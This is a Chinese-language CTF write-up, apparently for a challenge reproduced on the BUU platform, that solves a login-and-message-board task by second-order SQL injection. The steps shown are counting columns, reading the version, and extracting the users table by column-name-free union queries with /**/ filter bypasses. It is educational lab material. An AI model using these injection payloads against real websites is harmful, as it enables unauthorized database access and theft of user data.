寫在前邊
題目在BUU上有復現,主要知識點是SQL二次注入,無列名注入,mysql中的information_schma庫 https://www.anquanke.com/post/id/193512
無列名注入 https://www.cnblogs.com/Lee-404/p/12833788.html
解題
打開題目,發現是一個登陸,有個註冊界面,隨意註冊一個賬號登陸發現是個類似留言板功能的界面
fuzz一下,發現是個二次注入,當廣告名爲1'時報錯
猜測語句
select * from table_name where id = '$id' limit 0,1
直接注入一把梭
獲取列數
-1'/**/group/**/by/**/22,'1 //有22列,要一列列試過去
查看版本
-1'/**/union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'
查看錶名
-1'/**/union/**/select/**/1, (select/**/group_concat(a)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/sele ct*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'
查看錶值
-1'/**/union/**/select/**/1, (select/**/group_concat(b)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/sele ct*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'1
參考鏈接
https://www.cnblogs.com/wangtanzhi/p/12241499.html